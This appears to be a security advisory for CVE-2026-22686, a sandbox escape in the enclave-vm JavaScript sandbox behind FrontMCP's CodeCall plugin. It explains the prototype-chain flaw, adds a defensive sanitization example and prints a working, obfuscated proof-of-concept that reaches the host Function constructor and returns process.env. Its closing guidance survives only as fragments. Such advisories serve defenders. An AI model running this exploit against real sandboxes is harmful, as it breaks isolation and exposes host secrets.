CVE-2026-22686 is a critical severity vulnerability with a CVSS score of 10.0. Exploits are available; patches have been released and should be applied urgently.
EPSS: very low probability of exploitation. EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A critical sandbox escape vulnerability exists in enclave-vm (affected: < 2.6.0, patched: 2.7.0) that can allow untrusted, sandboxed JavaScript to execute arbitrary code in the host Node.js runtime.
When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor:
Error instance → Error.prototype → Error constructor → Function constructor
With access to the host Function constructor, an attacker can compile and execute arbitrary JavaScript in the host context — bypassing the sandbox boundary and potentially gaining access to sensitive resources such as process.env, filesystem, and network.
This breaks enclave-vm’s core security guarantee of isolating untrusted code.
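An added example, not taken from enclave-vm or its patch: one way to stop host-realm errors from crossing a sandbox boundary, with a regression probe that follows the prototype chain described above. All function and variable names here are hypothetical, and `node:vm` is used only to obtain a second realm (it is not itself a security boundary).

```javascript
const vm = require('node:vm');

// Hypothetical host-side tool registry (constructed for this example).
const tools = { echo: (args) => args.text };

// Host dispatcher: throws an ordinary host-realm Error for unknown tools.
function callToolRaw(name, args) {
  if (!Object.hasOwn(tools, name)) throw new Error(`unknown tool: ${name}`);
  return tools[name](args);
}

// Reduce any thrown value to primitive strings on a frozen, null-prototype
// object, so nothing with a host prototype chain crosses the boundary.
// Nested fields such as `cause` or `stack` are deliberately dropped.
function toSafeError(err) {
  const safe = Object.create(null);
  safe.name = typeof err?.name === 'string' ? err.name : 'Error';
  safe.message = typeof err?.message === 'string' ? err.message : 'tool call failed';
  return Object.freeze(safe);
}

// Boundary wrapper: same call, but failures are rethrown sanitized.
function callToolSafe(name, args) {
  try {
    return callToolRaw(name, args);
  } catch (err) {
    throw toSafeError(err);
  }
}

// Regression probe: inside a separate realm, follow prototype -> constructor
// -> constructor from the caught value and hand back whatever is reached.
function constructorReachedFrom(caught) {
  const realm = vm.createContext({ caught });
  return vm.runInContext(
    '(() => { const p = Object.getPrototypeOf(caught);' +
    ' const c = p && p.constructor; return c ? c.constructor : undefined; })()',
    realm);
}

// Run a call that is expected to fail and return the thrown value.
function capture(fn) {
  try { fn(); } catch (e) { return e; }
  return undefined;
}
```

A check like `constructorReachedFrom(...) === Function` on the host side can serve as a unit test that fails whenever a raw host error reaches sandboxed code.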
FrontMCP is a TypeScript-first framework for building MCP servers, and the CodeCall plugin enables models to orchestrate large toolsets by generating and executing JavaScript plans.
Enclave is the defense-in-depth sandbox layer behind CodeCall (AST validation + runtime sandboxing). If you use FrontMCP CodeCall for agent tool execution, you should treat this as an urgent upgrade and ensure your runtime is on a patched enclave-vm version.
To explore Enclave’s execution model (AgentScript + tool calls) and validate your integration behavior, use the live playground, which the Enclave repo links at enclave.agentfront.dev.
This is the quickest way to understand the sandbox / tool-call flow and confirm your environment is running a patched setup.
[email protected] (Jan 9, 2026)
⚠️ For defensive validation and maintainers. Do not run PoCs on hosts you don’t own/control.
// Vector 35: The Host Error Escape
// Purpose: Trigger a Host-side error and traverse its prototype chain
// to reach the Host Function constructor.
// Runs as AgentScript inside the enclave, which supplies callTool and
// allows top-level await/return.
const s = (...args) => String.fromCharCode(...args);
const kCon = s(99,111,110,115,116,114,117,99,116,111,114); // "constructor"
const kProto = s(95,95,112,114,111,116,111,95,95); // "__proto__"
const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95); // "__lookupGetter__"
const kCode = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118); // "return process.env"
const kPtype = s(112,114,111,116,111,116,121,112,101); // "prototype"
try {
  const ObjectProto = Object[kPtype];
  const lookup = ObjectProto[kLookup];
  const getProtoNative = lookup.call(ObjectProto, kProto);
  let hostError;
  try {
    // A failing tool call is what hands the host-side Error to sandboxed code.
    await callTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
  } catch (e) {
    hostError = e;
  }
  // Error instance → Error.prototype → Error constructor → Function constructor
  const errProto = getProtoNative.call(hostError);
  const ErrorCtor = errProto[kCon];
  const HostFunc = ErrorCtor[kCon];
  const exploitFn = HostFunc(kCode);
  return exploitFn();
} catch (e) {
  return e.message;
}
Immediate action:
Defense-in-depth guidance:
Function constructors